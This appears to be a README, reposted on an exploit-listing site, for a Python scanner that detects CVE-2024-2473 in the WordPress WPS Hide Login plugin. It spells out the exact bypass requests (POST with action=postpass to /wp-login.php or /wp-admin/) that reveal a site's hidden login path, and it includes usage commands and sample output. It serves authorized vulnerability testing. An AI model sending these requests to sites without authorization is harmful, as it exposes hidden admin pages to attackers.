Share
## https://sploitus.com/exploit?id=96AAF477-A24A-5306-BA39-AB012AC3863F
# CVE-2024-2473 โ WPS Hide Login Page Identifier
**A professional Python scanner to detect Login Page Disclosure in WordPress sites running WPS Hide Login โค 1.9.15.2**





*Coded by [Venexy](https://github.com/m4xsec)*
---
## Table of Contents
- [Overview](#overview)
- [Vulnerability Details](#vulnerability-details)
- [How It Works](#how-it-works)
- [Requirements](#requirements)
- [Installation](#installation)
- [Usage](#usage)
- [Output Example](#output-example)
- [Disclaimer](#disclaimer)
- [References](#references)
---
## Overview
**WPS Hide Login** is a popular WordPress plugin that allows administrators to change the default `/wp-login.php` URL to a custom, hidden path โ acting as security through obscurity.
This scanner detects **CVE-2024-2473**, a vulnerability where the `action=postpass` parameter can be supplied to bypass the plugin's protection mechanism entirely, exposing the hidden login page URL to unauthenticated attackers.
---
## Vulnerability Details
| Field | Details |
|------------------|-------------------------------------------------------------------------|
| **CVE ID** | CVE-2024-2473 |
| **Affected** | WPS Hide Login plugin โค 1.9.15.2 for WordPress |
| **Severity** | Medium |
| **CVSS Score** | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |
| **CWE** | CWE-200 โ Exposure of Sensitive Information |
| **EPSS Score** | 0.10433 (93rd percentile) |
| **Auth Required**| None |
| **Vendor** | WPServeur |
| **Remediation** | Update plugin to version > 1.9.15.2 |
### Description
The WPS Hide Login plugin relocates the WordPress login page from the default `/wp-login.php` to a custom URL chosen by the administrator. However, in all versions up to and including **1.9.15.2**, supplying the `action=postpass` query parameter to either `/wp-login.php` or `/wp-admin/` bypasses this protection, revealing the hidden login form's actual action URL โ effectively exposing the secret login path to any unauthenticated attacker.
---
## How It Works
The scanner replicates the vulnerability's attack flow across three phases:
```
Phase 1 โโบ Confirm target is a WordPress installation
โ
โผ
Phase 2a โโบ POST /wp-login.php?action=postpass
with body: action=lostpassword&post_password=test
Check: HTTP 200 + lostpasswordform present + no wp-login.php in body
Extract hidden login URL from form action attribute
โ
Phase 2b โโบ POST /wp-admin/?action=postpass
Check: HTTP 302 redirect to location containing reauth=1 or /login
โ
โผ
Report hidden login URL if discovered
```
If **either Phase 2a or Phase 2b** matches, the target is flagged as **vulnerable**.
---
## Requirements
- Python **3.7** or higher
- [`requests`](https://pypi.org/project/requests/) library
---
## Installation
**1. Clone the repository**
```bash
git clone https://github.com/m4xsec/CVE-2024-2473.git
cd CVE-2024-2473
```
**2. Install dependencies**
```bash
pip install requests
```
> **Note:** On systems using Python virtual environments or Kali Linux, you may need:
> ```bash
> pip install requests --break-system-packages
> ```
---
## Usage
```
python CVE-2024-2473.py -u [-t TIMEOUT]
```
### Arguments
| Argument | Description | Default |
|----------------------|--------------------------------------------------|---------|
| `-u`, `--url` | Target WordPress base URL *(required)* | โ |
| `-t`, `--timeout` | HTTP request timeout in seconds | `10` |
### Examples
```bash
# Basic scan
python CVE-2024-2473.py -u https://example.com
# Scan with custom timeout
python CVE-2024-2473.py -u https://example.com --timeout 15
# Scan over HTTP
python CVE-2024-2473.py -u http://192.168.1.100
```
---
## Output Example
```
...
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2024-2473 โข WPS Hide Login Page Identifier โ
โ Coded by Venexy | https://github.com/m4xsec โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
===============================================================
TARGET https://example.com
TIME 2024-11-01 18:00:00
TIMEOUT 10s
===============================================================
[18:00:00] [*] Phase 1 | Fingerprinting WordPress installation ...
[18:00:01] [+] WordPress confirmed โ https://example.com
[18:00:01] [*] Phase 2 | Testing CVE-2024-2473 bypass vectors ...
[18:00:01] [*] Vector A | POST /wp-login.php?action=postpass
+- Status : 200 Result : MATCH
[18:00:02] [*] Vector B | POST /wp-admin/?action=postpass
+- Status : 302 Result : MATCH
###############################################################
## VULNERABILITY CONFIRMED -- CVE-2024-2473 ##
###############################################################
Plugin WPS Hide Login > https://example.com/my-secret-admin-path/
====================================================
```
---
## Disclaimer
> **This tool is intended for authorized security testing and educational purposes only.**
>
> The author is not responsible for any misuse or damage caused by this tool. Always obtain explicit written permission from the target system owner before conducting any security assessment. Unauthorized scanning or exploitation of systems is illegal and unethical.
>
> Use responsibly.
---
## References
| Resource | Link |
|----------|------|
| NVD โ CVE-2024-2473 | https://nvd.nist.gov/vuln/detail/CVE-2024-2473 |
| Wordfence Advisory | https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wps-hide-login/wps-hide-login-19152-login-page-disclosure |
| WPS Hide Login Plugin | https://wordpress.org/plugins/wps-hide-login/ |
| CWE-200 | https://cwe.mitre.org/data/definitions/200.html |
| CVSS 3.1 Calculator | https://www.first.org/cvss/calculator/3.1 |
---
**Coded with โค๏ธ by [Venexy](https://github.com/m4xsec)**
If this tool helped you, consider giving the repository a โญ๐๐๐